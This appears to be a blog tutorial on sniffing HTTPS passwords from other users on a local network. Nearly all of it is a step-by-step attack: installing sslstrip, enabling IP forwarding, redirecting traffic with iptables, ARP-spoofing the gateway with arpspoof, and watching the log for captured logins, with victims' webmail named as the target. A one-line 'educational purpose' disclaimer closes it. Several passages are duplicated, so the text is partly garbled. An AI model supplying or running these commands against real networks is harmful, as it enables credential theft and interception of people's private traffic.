I posted a tutorial on how to sniff passwords from your LAN, which showed us how to sniff HTTP, FTP, POP, TELNET username and passwords.
Today i have an interesting and simple tutorial on how to sniff passwords from HTTPS sites from your LAN (Local Area Network).
We will be doing a Man In The Middle with Arpspoof to attack to our gateway server, while running SSLSTRIP-0.9 on another terminal.
Tools Used :
Tools Used :
- Backtrack 5 KDE 32bit
- Arpspoof
- Sslstrip-0.9
PREPARATION : (If you have not installed SSLSTRIP on your Backtrack)
1) On a terminal type : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz.
2) Next lets proceed to unzip the file by typing : tar zxvf sslstrip-0.9.tar.gz.
3) To enter the new extracted folder, type :cd sslstrip-0.9.
4) And finally to install, type : python setup.py install.
Lets Begin:
Lets Begin:
1) First, lets enable port forwarding by typing : echo ’1' > /proc/sys/net/ipv4/ip_forward .
2) Secondly, locate the Gateway IP on our LAN, to do this type : netstat -nr .
3) Now we have to set out iptables to redirect to port 8080, to do this type : iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 .
4) Start arpspoofing by typing : arpspoof -i wlan0 192.168.0.1(Replace wlan0 with your network type and replace IP address with your gateway server IP, which we obtain earlier by typing netstat -nr.
5) Lastly lets activate sslstrip by typing : sslstrip -l 8080 .
6) Set up is complete!! Ok so now as shown below, we have two terminals running. One is doing the arpspoofing while the other terminal is running sslstrip.
7) If you want to monitor your logs as they arrive, Open a third terminal and type : tail -f sslstrip.log .
8) When users on your LAN start to log onto https sites or any site for that matter, your screen will be filled with alot of gibberish, trash looking errors and stuff. This is normal, dont worry about it. Just have a joint and wait it out 
and with some patience…………………………Voila!
and with some patience…………………………Voila!
Objective :
What we just did is instruct the gateway server to watch HTTP traffic, look for links and redirects to HTTPS traffic, and rewrite them into HTTP.
So when our victim proceeds to www.hotmail.com. Instead of being presented with the secured https:// …he or she will receive http://www.hotmail.com , stripping away the ssl security.
Special Note :
What we just did is instruct the gateway server to watch HTTP traffic, look for links and redirects to HTTPS traffic, and rewrite them into HTTP.
So when our victim proceeds to www.hotmail.com. Instead of being presented with the secured https:// …he or she will receive http://www.hotmail.com , stripping away the ssl security.
Special Note :
1) For those trying it the first time,I must warn you that you will most likely see error messages appear on your terminal (Shown Below). But dont worry too much about it. It will still work. From all the research iv done over this issue, iv come to understand that it is a common issue that many are facing. Keep updated with the official site to see the bugs & fixes for sslstrip-0.9.
2) If you are running a heavy process, there is a chance your network might go down for a bit. Once again, dont worry about it, it will be up and sorted pretty quickly. I dont think i need to tell you that when that happens, stop all your terminals and wait for the network to patch back up.
3) To minimize the gibberish nonsense in your log, you could Google for a script call parselog.py. Its decent and clears out a lot of the gibber.
4) Please take note that sslstrip doesnt not work against certain browsers like FF & Chrome and i believe gmail site as well. Do some research online regarding your target site.
5) This is for educational purpose, please>DO NOT harm the innocent.
COMMENTS